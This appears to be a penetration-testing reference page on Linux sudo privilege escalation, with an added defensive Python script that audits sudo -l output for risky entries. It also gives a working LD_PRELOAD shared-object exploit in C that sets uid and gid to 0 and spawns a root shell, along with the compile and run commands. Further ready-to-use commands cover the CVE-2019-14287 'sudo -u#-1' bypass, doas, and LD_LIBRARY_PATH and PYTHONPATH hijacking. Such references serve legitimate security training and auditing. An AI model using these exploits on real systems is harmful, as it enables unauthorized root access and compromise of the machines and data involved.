sudo privilege escalation
An excellent reference to exploit sudo: SUDO_KILLER (2.1k ⭐). List sudoers with getent group sudo.
If you have administrative privileges, you can list them with:
$ sudo -nl # without a password
$ sudo -l # with a password
The first section lists the Defaults settings, including how environment variables are handled, which may be exploitable (for example LD_PRELOAD).
Matching Defaults entries for [...]:
[...] # something here
The second section lists your sudoers rights. Such commands may be exploited to get root: look the command up on GTFOBins (#sudo).
User [...] may run the following commands on [...]:
(root) /bin/tar
➡️ For instance, the user in the listing above can run /bin/tar as root.
Sometimes, instead of root, we may be able to run commands as another user, such as /opt/script.sh as user xxx. Use sudo -u xxx.
Sometimes, patterns (wildcards) are used in commands/paths. In a path, it means we can use ../. In a command, we can use any option.
User [...] may run the following commands on [...]:
(root) NOPASSWD: /usr/bin/vim
(ALL) NOPASSWD: /usr/bin/vim
(xxx) NOPASSWD: /opt/*.sh
(root) /usr/bin/ssh *
(ALL : ALL) SETENV: NOPASSWD: /usr/bin/python3
⚠️ If you can only execute the script and not read it, either check whether the script uses an injectable parameter, or try to find the source code somewhere else (e.g. on Git).
⚠️ A configuration may contain both env_keep and env_reset. The option sudo -E is the same as env_keep.
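As an added example (not part of the original note), the following audit script parses the two sections of `sudo -l` described above and flags the risky patterns discussed on this page: a missing env_reset, env_keep of LD_PRELOAD / LD_LIBRARY_PATH / PYTHONPATH, NOPASSWD and SETENV tags, wildcards, and the shell-capable binaries named on the page. The sample output is constructed, not captured from a real host.

```python
import re

# Constructed sample of `sudo -l` output (not captured from a real host); it
# mirrors the Defaults and rule entries discussed in the note above.
SAMPLE_SUDO_L = """\
Matching Defaults entries for alice on host:
    env_reset, env_keep+="LD_PRELOAD", secure_path=/usr/bin:/bin

User alice may run the following commands on host:
    (root) /bin/tar
    (root) NOPASSWD: /usr/bin/vim
    (xxx) NOPASSWD: /opt/*.sh
    (root) /usr/bin/ssh *
    (ALL : ALL) SETENV: NOPASSWD: /usr/bin/python3
"""

# Variables that let the caller inject code into the privileged command.
RISKY_ENV = ("LD_PRELOAD", "LD_LIBRARY_PATH", "PYTHONPATH")
# Binaries named on this page that GTFOBins documents as able to run arbitrary
# commands through sudo (extend with your own list).
SHELL_CAPABLE = {"tar", "vim", "ssh", "python3"}
# Shape of one rule line: "(runas) TAG: TAG: command args"
RULE_RE = re.compile(r"^\s*\(([^)]+)\)\s*((?:[A-Z]+:\s*)*)(.*)$")


def audit_sudo_l(text):
    """Return (entry, reason) findings for one user's `sudo -l` output."""
    findings = []
    head, _, rules = text.partition("may run the following commands")
    # Defaults section: without env_reset the caller's whole environment,
    # LD_PRELOAD included, reaches the command ("!env_reset" counts as absent).
    if not re.search(r"(?<!!)\benv_reset\b", head):
        findings.append(("Defaults", "env_reset missing: caller environment is kept"))
    for var in RISKY_ENV:
        if re.search(r'env_keep\s*\+?=\s*"?[^\n]*\b' + var + r"\b", head):
            findings.append(("Defaults", f"env_keep preserves {var}"))
    # Rule section: one "(runas) TAGS: command" line per permitted command.
    for line in rules.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        entry, tags, cmd = line.strip(), m.group(2), m.group(3).strip()
        if "NOPASSWD" in tags:
            findings.append((entry, "NOPASSWD: runs without the user's password"))
        if "SETENV" in tags:
            findings.append((entry, "SETENV: caller may override the environment"))
        if "*" in cmd or "?" in cmd:
            findings.append((entry, "wildcard: path or arguments under caller control"))
        prog = cmd.split()[0].rsplit("/", 1)[-1] if cmd else ""
        if prog in SHELL_CAPABLE:
            findings.append((entry, "binary can spawn a shell or execute code"))
    return findings


if __name__ == "__main__":
    for entry, reason in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"{entry:45} {reason}")
```

Feed it the saved output of `sudo -l` for each account you review; every finding maps to a section of this note.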
LD_PRELOAD
If there is env_keep += LD_PRELOAD in the permissions displayed by sudo -l, OR if there is no env_reset, then we can set LD_PRELOAD and run code before the command executes.
The code below replaces the gid/uid of the user running the command with 0 (root). Then, it pops a bash shell (as root!).
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>   /* system(), unsetenv() */
#include <unistd.h>   /* setgid(), setuid() */

/* Runs when the library is loaded, i.e. before the sudo'd command's main() */
void _init() {
    //unsetenv("LD_PRELOAD");  /* optional: stop the library re-injecting into children */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
Compile it with (use the second form, with -nostartfiles, if the linker complains about a duplicate _init symbol from the C runtime start files):
$ cd /tmp
$ gcc -shared -fPIC init.c -o init.so
$ gcc -shared -fPIC init.c -o init.so -nostartfiles
Then, call the command that you could run as administrator (tar here), while setting LD_PRELOAD to the path of your shared object:
$ sudo LD_PRELOAD=/tmp/init.so tar
Congratulations, you are root now!
Well-known Vulnerabilities
sudo before 1.8.28 (CVE-2019-14287)
If a user was allowed to run one specific command using sudo, such as tar, then it was possible for any other user to impersonate the authorized user and run the command as root too.
$ sudo -u#-1 tar [...]
$ sudo -u#4294967295 tar [...]
Congratulations, you are root now!
Additional Notes
doas
Doas is a minimal alternative to sudo. The command is so minimal that I was not able to know why I could exploit it while there were no configuration files and I could not use my own (did nothing).
$ doas -u root bash
LD_LIBRARY_PATH
While uncommon, if the sudo configuration includes env_keep+=LD_LIBRARY_PATH, we are able to set a custom folder for .so files. Refer to Shared Object Hijacking.
$ sudo LD_LIBRARY_PATH=/path/to/xx/ [...]
PYTHONPATH
While uncommon, if the sudo configuration includes env_keep+=PYTHONPATH, we are able to set a custom folder for Python modules. Refer to Shared Object Hijacking.
$ sudo PYTHONPATH=/path/to/xx/ [...]